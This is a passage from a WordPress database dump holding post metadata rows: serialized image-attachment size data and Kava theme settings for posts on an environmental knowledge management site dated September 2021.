photo-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:23:\"cover_photo-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:23:\"cover_photo-370x462.png\";s:5:\"width\";i:370;s:6:\"height\";i:462;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:23:\"cover_photo-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:23:\"cover_photo-600x383.png\";s:5:\"width\";i:600;s:6:\"height\";i:383;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:23:\"cover_photo-640x462.png\";s:5:\"width\";i:640;s:6:\"height\";i:462;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30838,4307,'_wp_attached_file','2021/09/Environmental-Knowledge-Management-System.pptx'),(30881,4314,'_wp_attached_file','2021/09/Environmental-Knowledge-Management-System-1.pptx'),(30895,4323,'_edit_lock','1632324141:42'),(30896,4323,'_last_editor_used_jetpack','block-editor'),(30897,4324,'_wp_attached_file','2021/09/story.png'),(30898,4324,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2021/09/story.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"story-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"story-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"story-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"story-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"story-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"story-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"story-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:17:\"story-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:17:\"story-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:17:\"story-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:17:\"story-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30901,4323,'_wp_old_date','2021-09-22'),(30902,4323,'_thumbnail_id','4324'),(30903,4323,'_edit_last','42'),(30904,4323,'kava_extra_enable_breadcrumbs','inherit'),(30905,4323,'post_formats',''),(30906,4323,'gallery_tab',''),(30907,4323,'kava_extra_gallery_images',''),(30908,4323,'link_tab',''),(30909,4323,'kava_extra_link',''),(30910,4323,'kava_extra_link_target','_blank'),(30911,4323,'quote_tab',''),(30912,4323,'kava_extra_quote_text',''),(30913,4323,'kava_extra_quote_cite',''),(30914,4323,'audio_tab',''),(30915,4323,'kava_extra_audio',''),(30916,4323,'kava_extra_audio_loop','false'),(30917,4323,'kava_extra_audio_autoplay','false'),(30918,4323,'kava_extra_audio_preload','false'),(30919,4323,'video_tab',''),(30920,4323,'kava_extra_video_type','library'),(30921,4323,'kava_extra_video_library',''),(30922,4323,'kava_extra_video_external',''),(30923,4323,'kava_extra_video_poster',''),(30924,4323,'kava_extra_video_width','770'),(30925,4323,'kava_extra_video_height','480'),(30926,4323,'kava_extra_video_loop','false'),(30927,4323,'kava_extra_video_autoplay','false'),(30928,4323,'kava_extra_video_preload','false'),(30929,4326,'_edit_lock','1632324427:42'),(30930,4326,'_last_editor_used_jetpack','block-editor'),(30931,4327,'_wp_attached_file','2021/09/climate-change.png'),(30932,4327,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:26:\"2021/09/climate-change.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"climate-change-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"climate-change-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"climate-change-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"climate-change-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:25:\"climate-change-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:26:\"climate-change-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:26:\"climate-change-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:26:\"climate-change-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:26:\"climate-change-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:26:\"climate-change-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:26:\"climate-change-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30935,4326,'_wp_old_date','2021-09-22'),(30936,4326,'_thumbnail_id','4327'),(30937,4326,'_edit_last','42'),(30940,4326,'kava_extra_enable_breadcrumbs','inherit'),(30941,4326,'post_formats',''),(30942,4326,'gallery_tab',''),(30943,4326,'kava_extra_gallery_images',''),(30944,4326,'link_tab',''),(30945,4326,'kava_extra_link',''),(30946,4326,'kava_extra_link_target','_blank'),(30947,4326,'quote_tab',''),(30948,4326,'kava_extra_quote_text',''),(30949,4326,'kava_extra_quote_cite',''),(30950,4326,'audio_tab',''),(30951,4326,'kava_extra_audio',''),(30952,4326,'kava_extra_audio_loop','false'),(30953,4326,'kava_extra_audio_autoplay','false'),(30954,4326,'kava_extra_audio_preload','false'),(30955,4326,'video_tab',''),(30956,4326,'kava_extra_video_type','library'),(30957,4326,'kava_extra_video_library',''),(30958,4326,'kava_extra_video_external',''),(30959,4326,'kava_extra_video_poster',''),(30960,4326,'kava_extra_video_width','770'),(30961,4326,'kava_extra_video_height','480'),(30962,4326,'kava_extra_video_loop','false'),(30963,4326,'kava_extra_video_autoplay','false'),(30964,4326,'kava_extra_video_preload','false'),(30965,4329,'_edit_lock','1632324689:42'),(30966,4329,'_last_editor_used_jetpack','block-editor'),(30967,4330,'_wp_attached_file','2021/09/scnl.png'),(30968,4330,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2021/09/scnl.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"scnl-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"scnl-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"scnl-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"scnl-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"scnl-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"scnl-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"scnl-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"scnl-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"scnl-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:16:\"scnl-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:16:\"scnl-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30971,4329,'_wp_old_date','2021-09-22'),(30972,4329,'_thumbnail_id','4330'),(30973,4329,'_edit_last','42'),(30974,4329,'kava_extra_enable_breadcrumbs','inherit'),(30975,4329,'post_formats',''),(30976,4329,'gallery_tab',''),(30977,4329,'kava_extra_gallery_images',''),(30978,4329,'link_tab',''),(30979,4329,'kava_extra_link',''),(30980,4329,'kava_extra_link_target','_blank'),(30981,4329,'quote_tab',''),(30982,4329,'kava_extra_quote_text',''),(30983,4329,'kava_extra_quote_cite',''),(30984,4329,'audio_tab',''),(30985,4329,'kava_extra_audio',''),(30986,4329,'kava_extra_audio_loop','false'),(30987,4329,'kava_extra_audio_autoplay','false'),(30988,4329,'kava_extra_audio_preload','false'),(30989,4329,'video_tab',''),(30990,4329,'kava_extra_video_type','library'),(30991,4329,'kava_extra_video_library',''),(30992,4329,'kava_extra_video_external',''),(30993,4329,'kava_extra_video_poster',''),(30994,4329,'kava_extra_video_width','770'),(30995,4329,'kava_extra_video_height','480'),(30996,4329,'kava_extra_video_loop','false'),(30997,4329,'kava_extra_video_autoplay','false'),(30998,4329,'kava_extra_video_preload','false'),(30999,4332,'_edit_lock','1632325014:42'),(31000,4332,'_last_editor_used_jetpack','block-editor'),(31001,4333,'_wp_attached_file','2021/09/epa.png'),(31002,4333,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2021/09/epa.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"epa-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"epa-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"epa-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"epa-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"epa-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"epa-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"epa-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"epa-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"epa-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:15:\"epa-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"epa-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31005,4332,'_wp_old_date','2021-09-22'),(31006,4332,'_thumbnail_id','4333'),(31007,4332,'_edit_last','42'),(31008,4332,'kava_extra_enable_breadcrumbs','inherit'),(31009,4332,'post_formats',''),(31010,4332,'gallery_tab',''),(31011,4332,'kava_extra_gallery_images',''),(31012,4332,'link_tab',''),(31013,4332,'kava_extra_link',''),(31014,4332,'kava_extra_link_target','_blank'),(31015,4332,'quote_tab',''),(31016,4332,'kava_extra_quote_text',''),(31017,4332,'kava_extra_quote_cite',''),(31018,4332,'audio_tab',''),(31019,4332,'kava_extra_audio',''),(31020,4332,'kava_extra_audio_loop','false'),(31021,4332,'kava_extra_audio_autoplay','false'),(31022,4332,'kava_extra_audio_preload','false'),(31023,4332,'video_tab',''),(31024,4332,'kava_extra_video_type','library'),(31025,4332,'kava_extra_video_library',''),(31026,4332,'kava_extra_video_external',''),(31027,4332,'kava_extra_video_poster',''),(31028,4332,'kava_extra_video_width','770'),(31029,4332,'kava_extra_video_height','480'),(31030,4332,'kava_extra_video_loop','false'),(31031,4332,'kava_extra_video_autoplay','false'),(31032,4332,'kava_extra_video_preload','false'),(31033,4335,'_edit_lock','1632325927:42'),(31034,4335,'_last_editor_used_jetpack','block-editor'),(31035,4336,'_wp_attached_file','2021/09/nccsc.png'),(31036,4336,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2021/09/nccsc.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"nccsc-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"nccsc-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"nccsc-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"nccsc-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"nccsc-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"nccsc-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"nccsc-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:17:\"nccsc-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:17:\"nccsc-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:17:\"nccsc-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:17:\"nccsc-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31039,4335,'_wp_old_date','2021-09-22'),(31040,4335,'_thumbnail_id','4336'),(31041,4335,'_edit_last','42'),(31042,4335,'kava_extra_enable_breadcrumbs','inherit'),(31043,4335,'post_formats',''),(31044,4335,'gallery_tab',''),(31045,4335,'kava_extra_gallery_images',''),(31046,4335,'link_tab',''),(31047,4335,'kava_extra_link',''),(31048,4335,'kava_extra_link_target','_blank'),(31049,4335,'quote_tab',''),(31050,4335,'kava_extra_quote_text',''),(31051,4335,'kava_extra_quote_cite',''),(31052,4335,'audio_tab',''),(31053,4335,'kava_extra_audio',''),(31054,4335,'kava_extra_audio_loop','false'),(31055,4335,'kava_extra_audio_autoplay','false'),(31056,4335,'kava_extra_audio_preload','false'),(31057,4335,'video_tab',''),(31058,4335,'kava_extra_video_type','library'),(31059,4335,'kava_extra_video_library',''),(31060,4335,'kava_extra_video_external',''),(31061,4335,'kava_extra_video_poster',''),(31062,4335,'kava_extra_video_width','770'),(31063,4335,'kava_extra_video_height','480'),(31064,4335,'kava_extra_video_loop','false'),(31065,4335,'kava_extra_video_autoplay','false'),(31066,4335,'kava_extra_video_preload','false'),(31067,4338,'_edit_lock','1632326275:42'),(31068,4338,'_last_editor_used_jetpack','block-editor'),(31069,4339,'_wp_attached_file','2021/09/motorbikes.png'),(31070,4339,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:22:\"2021/09/motorbikes.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"motorbikes-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"motorbikes-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"motorbikes-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"motorbikes-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"motorbikes-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"motorbikes-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"motorbikes-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:22:\"motorbikes-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"motorbikes-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:22:\"motorbikes-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:22:\"motorbikes-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31073,4338,'_wp_old_date','2021-09-22'),(31074,4338,'_thumbnail_id','4339'),(31075,4338,'_edit_last','42'),(31076,4338,'kava_extra_enable_breadcrumbs','inherit'),(31077,4338,'post_formats',''),(31078,4338,'gallery_tab',''),(31079,4338,'kava_extra_gallery_images',''),(31080,4338,'link_tab',''),(31081,4338,'kava_extra_link',''),(31082,4338,'kava_extra_link_target','_blank'),(31083,4338,'quote_tab',''),(31084,4338,'kava_extra_quote_text',''),(31085,4338,'kava_extra_quote_cite',''),(31086,4338,'audio_tab',''),(31087,4338,'kava_extra_audio',''),(31088,4338,'kava_extra_audio_loop','false'),(31089,4338,'kava_extra_audio_autoplay','false'),(31090,4338,'kava_extra_audio_preload','false'),(31091,4338,'video_tab',''),(31092,4338,'kava_extra_video_type','library'),(31093,4338,'kava_extra_video_library',''),(31094,4338,'kava_extra_video_external',''),(31095,4338,'kava_extra_video_poster',''),(31096,4338,'kava_extra_video_width','770'),(31097,4338,'kava_extra_video_height','480'),(31098,4338,'kava_extra_video_loop','false'),(31099,4338,'kava_extra_video_autoplay','false'),(31100,4338,'kava_extra_video_preload','false'),(31101,4341,'_edit_lock','1632329272:42'),(31102,4341,'_last_editor_used_jetpack','block-editor'),(31103,4342,'_wp_attached_file','2021/09/ekms-.png'),(31104,4342,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2021/09/ekms-.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"ekms--300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"ekms--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"ekms--768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"ekms--370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"ekms--150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"ekms--230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"ekms--400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:17:\"ekms--370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:17:\"ekms--570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:17:\"ekms--600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:17:\"ekms--640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31107,4341,'_wp_old_date','2021-09-22'),(31108,4341,'_thumbnail_id','4342'),(31109,4341,'_edit_last','42'),(31110,4341,'kava_extra_enable_breadcrumbs','inherit'),(31111,4341,'post_formats',''),(31112,4341,'gallery_tab',''),(31113,4341,'kava_extra_gallery_images',''),(31114,4341,'link_tab',''),(31115,4341,'kava_extra_link',''),(31116,